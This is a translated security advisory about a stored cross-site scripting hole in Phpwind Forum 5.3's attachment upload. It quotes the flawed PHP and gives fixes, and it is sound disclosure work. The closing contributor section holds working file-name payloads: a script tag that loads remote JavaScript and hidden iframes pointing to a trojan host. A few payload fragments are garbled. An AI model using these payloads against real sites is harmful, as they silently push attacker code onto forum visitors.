Phpwind Forum 5.3 postupload.php attachment file name Cross-Site Scripting Vulnerability

Source: Internet
Author: User
Tags: mysql query
Note: This is just a vulnerability announcement and not original work in the general sense; it is therefore published under this account. I would like to thank fragment, lazy week, ring04h and other members for their discussion. The MIIT Information Security Team has submitted the vulnerability to phpwind.

Phpwind forums v5.3 postupload.php Cross Site Script (XSS)
Phpwind Forum 5.3 postupload.php file Cross-Site Scripting Vulnerability (XSS)

Vulnerability cause:
The require\postupload.php file does not strictly filter the atc_attachment_name variable, so the attachment file name can carry cross-site scripting and embed malicious code in the site's pages.
fragment initially provided a test result:

Vulnerability code analysis:
The following is the source code in require\postupload.php that causes the problem:
......
$source = $db_ifftp ? $db_ftpweb . "/" . $fileuplodeurl : $attachdir . '/' . $fileuplodeurl;
// stored as forumid_filename_time.type
if ($db_ifftp) {
    $ftpsize = $ftp->upload($atc_attachment, $fileuplodeurl);
} elseif (!postupload($atc_attachment, $source)) {
    Showmsg('upload_error');
}
if (eregi("\.(gif|jpg|png|bmp|swf)$", $atc_attachment_name) && function_exists('getimagesize')) { // only the extension is checked here
    if (!$img_size = getimagesize($source)) {
        $db_ifftp ? $ftp->delete($fileuplodeurl) : P_unlink($source);
        Showmsg('upload_content_error');
    }
    if (!$db_ifftp && $attach_ext != 'swf' && $db_watermark && $img_size[0] > $db_waterwidth && $img_size[1] > $db_waterheight) {
        if (function_exists('imagecreatefromgif') && function_exists('imagealphablending') && ($attach_ext != 'gif' || function_exists('imagegif') && ($db_ifgif == 2 || $db_ifgif == 1 && in_array(PHP_VERSION, array('4.4.3', '4.4.4', '5.1.5')))) && ($db_waterimg && function_exists('imagecopymerge') || !$db_waterimg && function_exists('imagettfbbox'))) {
            require_once(R_P . 'require/watermark.php');
            imgwatermark($source, $db_waterpos, $region, $db_watertext, $db_waterfont, $db_watercolor, $db_waterpct, $db_jpgquality);
        }
    }
}
if (eregi("\.(gif|jpg|jpeg|png|bmp|swf)$", $atc_attachment_name)) { // only the extension is checked here
    $ifupload = 1;
    if (eregi("\.swf$", $atc_attachment_name)) { // only the extension is checked here
        $type = 'zip';
    } else {
        $type = 'img';
    }
} elseif (eregi("\.(zip|rar)$", $atc_attachment_name)) { // only the extension is checked here
    $ifupload = 3;
    $type = 'zip';
} elseif (eregi("\.txt$", $atc_attachment_name)) { // only the extension is checked here
    $safecheckdb = $db_ifftp ? (function_exists('file_get_contents') ? file_get_contents($source) : '') : readover($source);
    if (strpos($safecheckdb, "onLoad") != false && strpos($safecheckdb, "submit") != false && strpos($safecheckdb, "post") != false && strpos($safecheckdb, "form") != false) {
        $db_ifftp ? $ftp->delete($fileuplodeurl) : P_unlink($source);
        Showmsg('upload_content_error');
    } else {
        $ifupload = 2;
        $type = 'txt';
    }
} else {
    $ifupload = 3;
    $type = 'zip';
}
$size = $db_ifftp ? ceil($ftpsize / 1024) : ceil(filesize("$attachdir/$fileuplodeurl") / 1024);
$atc_attachment_name = addslashes($atc_attachment_name); // only quotes are escaped; HTML is left intact
if ($ifreplace == 0) { // the attachment record is written to the database below
    $db->update("INSERT INTO pw_attachs SET fid='$fid', uid='$winduid', hits=0, name='$atc_attachment_name', type='$type', size='$size', attachurl='$fileuplodeurl', needrvrc='$needrvrc', uploadtime='$timestamp', descrip='$descrip'");
    $aid = $db->insert_id();
    $attachs[$aid] = array(
        'aid'       => $aid,
        'name'      => stripslashes($atc_attachment_name),
        'type'      => $type,
        'attachurl' => $fileuplodeurl,
        'needrvrc'  => $needrvrc,
        'size'      => $size,
        'others'    => 0,
        'desc'      => str_replace('\\', '', $descrip)
    );
} else {
    $aid = $replacedb[$i]['aid'];
    $db->update("UPDATE pw_attachs SET name='$atc_attachment_name', type='$type', size='$size', attachurl='$fileuplodeurl', needrvrc='$needrvrc', uploadtime='$timestamp', descrip='$descrip' WHERE aid='$aid'");
    $oldattach[$aid]['name'] = $atc_attachment_name;
    $oldattach[$aid]['type'] = $type;
    $oldattach[$aid]['size'] = $size;
}
}
......
The postupload.php file never filters the file name submitted in the atc_attachment_name variable: only the extension is checked, addslashes() escapes quotes for the SQL statement, and the name is then stored and later rendered with its HTML intact.

Vulnerability Testing:
To reproduce, enter a crafted cross-site script in the attachment's file path box (not the description box) when submitting the attachment; the same path is what an attacker would use to plant a trojan on the forum.
Test Method 1: the following is the test string and screenshot provided by zhouzhen:

The plain text of zhouzhen's test string is as follows:
D:\zhouzhen xxs.rar

Because the file name cannot contain characters such as /, ASCII encoding is used to embed the script.

Temporary repair:
Repair Method 1, regular expression:
Insert the following after line 3 of the source code (line 45 of the code block above), so that the final file name is filtered before the MySQL query is executed:
if (isset($atc_attachment_name)) {
    if (!eregi("^[_a-z0-9-]+\.(gif|jpg|jpeg|png|bmp|zip|rar|gz|tgz|7z)$", $atc_attachment_name)) { // adjust the extension list to your site's needs
        echo "est name fail!";
        exit;
    }
}
Repair Method 2, string replacement:
To temporarily stop the cross-site problem, filter out the angle bracket so that no tag can be formed.
Modify line 157 of the source code (line 51 of the code block above) to the following:
$atc_attachment_name = stripslashes(str_replace("<", "", $atc_attachment_name));
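An added example, not phpwind's code and not the advisory's own patch, that puts both temporary repairs into one defensive check: a preg_match() whitelist in the spirit of Repair Method 1 (eregi() is deprecated), plus escaping when the stored name is rendered, which covers the goal of Repair Method 2 for rows written before any patch. The function names, the basename step, the 64-character limit, the extension list and the sample names are assumptions.

```php
<?php
// Added example (not phpwind's code). Assumed extension whitelist; adjust per site.
const ALLOWED_EXT = 'gif|jpg|jpeg|png|bmp|zip|rar|gz|tgz|7z';

/**
 * Returns the validated base name, or null when the name must be rejected.
 * Only [A-Za-z0-9_-], one dot and a whitelisted extension pass, so '<', '>',
 * '"', ':' and any encoded variant can never reach the pw_attachs table.
 */
function validate_attachment_name(string $name): ?string
{
    // Old browsers submit a full client path (e.g. "D:\dir\file.rar"); keep the base name only.
    $base = preg_replace('#^.*[\\\\/]#', '', $name);
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}\.(' . ALLOWED_EXT . ')$/i', $base)) {
        return null;
    }
    return $base;
}

/**
 * Output-side defence: whatever is stored, escape it at render time, so a row
 * written before the input check existed cannot execute in the browser either.
 */
function render_attachment_name(string $stored): string
{
    return htmlspecialchars($stored, ENT_QUOTES, 'UTF-8');
}

// Constructed sample names (not taken from the advisory's screenshots).
$samples = [
    'report_2008.rar',                                   // plain name
    'D:\\zhouzhen\\xxs.rar',                             // full Windows path
    'zhouzhen<script src=//example.invalid/x.js>xxs.rar', // tag inside the name
    'shell.php',                                         // extension not whitelisted
    'pic.jpg.php',                                       // double extension
];
foreach ($samples as $s) {
    $ok = validate_attachment_name($s);
    printf("%-55s => %s\n", $s, $ok === null ? 'rejected' : 'accepted as ' . $ok);
}
// A legacy row is rendered through the escaper rather than echoed raw.
echo render_attachment_name('<script>legacy.rar'), "\n";
```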

Ring04h:
Enter in the attachment box:
D:\ring04h:<SCRIPT src=http://www.diaonilaomu.com/x.js>xss.rar
Convert to an ASCII-encoded POST:

Black virus:
You do not need to call a remote JS file; the trojan can be mounted directly as follows:
Local test environment: phpwind 5.0.1
D:\zhouzhen<IFRAME src=http://www.muma.com/><%2 w.rame>xxs.rar

D:\zhouzhen<IFRAME src=http://www.muma.com/test.htm width=0 height=0><%2 w.rame>xxs.rar
The / and are filtered out; the statement is constructed as follows:
http://www.muma.com/test.htm in hexadecimal encoding.
